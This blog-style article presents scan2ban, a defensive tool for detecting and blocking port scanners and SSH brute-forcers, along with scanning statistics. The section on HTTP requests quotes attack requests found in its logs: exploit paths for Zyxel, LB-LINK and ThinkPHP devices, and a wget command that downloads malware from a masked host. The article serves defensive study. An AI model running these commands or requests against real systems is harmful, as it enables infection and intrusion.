Scan2ban: Protecting Your Perimeter from Scanners and Bots
The days of a “herbivorous” Internet are long gone—when a machine with an exposed network stack on a public IP could survive for years, and only a handful of specialists knew what a CVE was. Statistics show that it takes about two minutes for an anonymous actor to find an open Telnet port, six minutes for Redis, twelve for a web server on port 8080, and twenty for Android Debug Bridge. And the people on the other end aren’t just collecting data for a thesis. To see for yourself, just open SSH and watch as, within half an hour, a whole team of “security specialists” starts hammering your port, generating logs like these:
You don’t have to work in IT security to guess what kind of “research” these folks are doing. And getting rid of their attention is tough. Once they latch on, more and more addresses join in, and soon it feels like the whole Internet is trying to brute-force your machine’s passwords.
By the numbers: in an hour, any IPv4 address (even one that doesn’t respond to anything) gets scanned over 300 times from about 150 sources. In a month, every port will be probed; in two weeks, 65,000; in a week, 63,000. The “small but numerous brotherhood” is definitely watching.
Even if your company’s infrastructure is managed by a team of experienced pros who quickly apply updates, never leave services running “just for five minutes” (that end up staying for years), and don’t upload files for contractors to “secret” ports, there’s still an unavoidable “window of vulnerability.” The exploit is already in the wild while developers are still testing the patch, and users are rolling it out—by the time it’s all done, attackers, with their pre-built fingerprint databases, will have already struck. Or they’ll just use IoT search engines that sell this info via API for a modest fee. Even a simple scan with ZMap can quickly build a rough target list for follow-up attacks. If you’re not hiding, it’s your problem.
It’s much better if attackers simply don’t know about your external services—at least until they take a direct interest.
Defining the Problem
Protecting your perimeter from scanning can be broken into two parts. First: building a blocklist of addresses with suspicious intentions (or, conversely, addresses you’re sure about). Second: distributing and applying this list across your machines.
Neither task is technically difficult, but a comprehensive solution needs extra logic and a format that’s convenient for storing and analyzing data.
Building such a tool just for yourself isn’t very practical, so when it became clear that a couple of scripts and a unit file wouldn’t cut it, I decided to create a more universal project for anyone interested in the topic. That’s how the scan2ban project was born—it helps me protect my machines from unwanted attention, and maybe it’ll help you too. Below, I’ll show how its different modules work and what you can achieve with them.
Threats and Countermeasures
If you think scanning is simple and there aren’t many variations, you’re mistaken. Over time, I’ve identified three types:
- Scanners: These are straightforward—port sweeps from a single address, either constantly or as a one-off. Easy to detect and block. If you get three packets and none hit an open port, the source goes on the blocklist. At the time of writing, here are the top ten most active sources of this type for the month:
- One-shotters: Less noticeable. They send a request from a random address to a specific port, just once. Blocking by counter is useless—they’ll be back much later, probing a different port. The first request will always get through if you have a service listening. These make up about 80% of incoming requests. Here’s what it looks like over a month:
Blocking these is only possible preemptively. The greyport module handles this, inspired by email greylisting. By default, all ports are closed, and to get access, a source must repeat the request a set number of times (configurable in the module). Usually, this only slows down the first connection. Access is granted for a day, then the process repeats. With one repeat, you block 80% of these; two blocks 90%, three blocks 95%. But three is the limit—most client stacks won’t send more than five retries, and legitimate clients may start failing.Effectiveness also depends on the port number. For example, for ports 80 and 22, the above numbers apply, but for Elasticsearch (9200), just one delayed packet blocks 99 out of 100 requests.
- Periodic Scanners: The calmest type. They probe here and there over time. Here’s what that looks like:
- IoT Search Engines: These send requests from various addresses, often multiple times. They have whole network segments and provider approval, so they can spread out their requests and take their time. The lazyscan module checks how many events have been registered from an address over a long period (default: a week). If it finds systematic activity, it slowly but surely adds the source to the blocklist. Over three months, more than 5,000 such sources were identified, with 50–60 new addresses added daily.
Owners of “legit” scanners suggest emailing them if you don’t like their activity. In theory, after you prove you own the range you want excluded, they’ll stop bothering you. But this is like blurring out parts of satellite maps—it only draws more attention. And there’s little point, since for every responsible scanner, there are five less responsive ones you can only complain about in a lottery. So the best tactic is silent blocking—it saves effort.
The “Honeypot” Effect
Let’s look at what scanners are interested in, protocol-wise—especially HTTP. Web admin panels, REST APIs, and other “conveniences” are not just for service owners, but also for those with “secret knowledge.” A clever request can make someone an admin without any ROP, heap spraying, or other advanced exploits. To monitor this, there’s a module that parses and classifies Nginx requests.
Besides boring Git repo scrapers and requests for /files
or /actuator/health
, the most popular request at the time of writing was POST /cgi-bin/ViewLog.asp
(targeting Zyxel devices). Next is POST /goform/set_LimitClient_cfg
(LB-LINK routers), and third is ThinkPHP with requests like GET /index.php?s=/index/\x09hink...
. There are countless requests for phpMyAdmin, GeoServer, and other CGI scripts. There are also regular attempts to make you download a file with a “surprise,” like wget http://x.x.x.x/bins/VuVhU33C
. If you run this file (don’t!), it’ll display something like “Infected by Cult,” kill your graphical session, start random processes, and begin downloading more malware.
The file is full of lines like p0wned
and l33t
mixed with idioms, and antivirus software will practically demand you smash your disk with a hammer. Clearly, no one bothers with obfuscation, since Linux malware protection is still rare. But this trend suggests it’s time to start using it—even on routers—unless we want to go back to paid traffic as the only way to force owners to secure their devices.
Sometimes logs reveal interesting things. For example, one user, after a neutral GET /
request, unexpectedly filled the logs with their “inner world.” Decoding the Base64 reveals lines like Trojan_C46F6E9
and HacKed_D4990627
—a clear hint at their activities. If you’re into analysis, try decoding the last four lines—maybe Batman needs help.
Responding to Events
The current blocklist is stored in a database (SQLite, but Postgres is better). Constantly polling the DB for new entries isn’t ideal, so there’s a response module. It lets you trigger external scripts when an event occurs—useful for automation, like instantly distributing blocks. You could even hook up a chatbot to send complaints to network operators (and get replies from another bot—very convenient).
About “Ping Blockers”
Blocking ICMP (ping) used to be a popular way to reduce interest in your machines. I compared incoming traffic on a test machine that replied to pings with one that didn’t, and found no significant difference. So, these days, such measures are mostly self-deception. Maybe in the 2400/NONE era, “silent” machines saved time for scanners, but now, with no bandwidth issues, blocking these protocols just creates more problems for yourself.
Paranoids may worry that open ICMP increases the attack surface, and that analyzing replies could reveal something interesting. But modern hackers are more likely to send malware via email (sometimes encrypted in an archive, asking the user for a password), so in my view, these precautions are unnecessary.
Who’s Knocking at My Door?
The event database lets you learn more about your “guests.” Here are the results of the “world championship” in unsolicited port scanning for the month (GeoIP integration allows for country-based metrics):
RU leads by a wide margin, but it’s not that simple. I’ll explain why later. Here are the top ten most scanned TCP ports:
The obsession with Telnet suggests a router epidemic; port 6379 (Redis) is in demand for “set-and-forget” servers, and ports 2222, 22322, and 22222 are new—last month, they weren’t even in the sample. Ports 23 and 6379 are most targeted from China, while the “twos” attract attention from the US.
About 30% of sources have the same port open as the one they’re scanning (sample for port 6379). For port 23 (Telnet), this drops to 15%. A paradise for security solution salespeople: clients are knocking on your door! If your techs aren’t scared off by CAPTCHAs like these:
UDP is less interesting to attackers, but still racks up a significant number of requests monthly:
Looking at the top three, you might think: “What’s your name? Jump time? Can I call you?” Two-thirds don’t even ask for a name—just go straight to “call.”
Which ports are the most “secret”? According to my data, port 58699 is the most secret—only five probes ever. Here’s the top ten:
Running services on non-standard ports, while “hacky,” significantly reduces your chances of being hit in the first wave of attacks after a new vulnerability is discovered. Even if your perimeter isn’t protected by blocklists, no one in their right mind will have bots scan every port—it’s too slow. They’ll focus on the most likely ones. So, something like Citrix Netscaler might survive a bit longer, giving owners time to grab patches from torrents and check for trojans before bots start working off data collected by services like Shodan.
After several months, the blocklist has over 11,000 addresses, with a total database of 154,000. The average increase is about 1,200 entries per day after the “warm-up,” with noticeable waves. Here’s a graph of new address registrations (the initial spike is from the “cold” start):
Here’s the breakdown by national segment, based on “traffic density” (number of requests per source):
The leaders are surprising. On closer inspection, it turns out that zones AZ, NL, EE, and BG have persistent scanners, making regular activity almost invisible. The difference in request density between first place (1,400 packets per address) and HK in sixth (45 packets per address) is 30x.
Among operators of the most “curious” networks (according to Whois), GB (UK) leads, then DE (Germany), and finally AZ (Azerbaijan). Let’s assume British scientists are doing research. There’s even a phone number and contact in Germany, so feel free to call and ask for details.
The “Englishwoman” Scans
Since most of the traffic is targeted information gathering, why not highlight the most active sources? Aggregating addresses by /24 segments gives us 16,519 such sources. To filter out accidental interest, let’s set a threshold based on known entities. For example, The Shadow Server Foundation (a slow scanner) generates no more than 400 requests per month. To be safe, let’s lower the threshold to 100 (so, to make the report, a /24 network must send at least 100 packets in a month). Here’s the result:
We’re in the top three, but don’t rush to grab your balalaika. Looking closer at the subnets in the RU zone, 95% of the traffic comes from just five. According to Whois, the first three are rented by a UK organization, the fourth by Cyprus, and the fifth by Ukraine. So, strictly speaking, we didn’t even make the qualifying round for “boldest scanner.”
With a list of anomalous networks, we can subtract them from the total and compare the remaining addresses to the size of the national segment. This gives a rough idea of who’s using their IP space most “efficiently” to keep artificial life going on the Internet:
In Ethiopia, for every 10,000 addresses, three are curious about us. These guys, though, have everything under control:
No surprises, except for South Africa’s presence. But it’s not an anomaly—the number of requests, sources, and segment size are comparable to neighbors.
Back to SSH password brute-forcing. The authentication tracking module can identify botnets, since controllers have to replace blocked elements, gradually revealing their capabilities. Over two months, more than 4,000 addresses were caught doing this:
Failed login attempts usually mean the address is moonlighting as more than just a cat picture server. Grouping RU addresses by operator gives this:
Marketers might want to use this as a new way to estimate hosting and Internet access market shares. Instead of relying on press releases claiming “dozens of industry leaders,” you can build a whole theory based on “natural activity.” Here’s a summary table of the most popular usernames used in login attempts:
The most surprising is the interest in the root
account, even though password login for root has long been disabled by default in all major Linux distributions. But apparently, this basic requirement is often ignored.
Looking Ahead
You might wonder how scanners could bypass these measures, and when the whole concept will “turn into a pumpkin.” There aren’t many ways around it. The main concept is resilient: few open ports, many closed ones, so the odds are against the attacker. Just a few mistakes and they’re blocked.
In the end, you can always rent cheap VPSs in different segments (agents run fine on a single-core machine with 1GB RAM) and block anyone who shows up even once.
The greyport concept has an obvious weakness: to “push through” the block, an attacker just needs to increase the number of requests. But here, the old saying applies: “To outrun a tiger, you don’t have to be the fastest—just not the slowest.”
As long as information gathering is effective, there’s no reason to complicate things. Attackers will only try to bypass when it stops working, and that’s not happening anytime soon.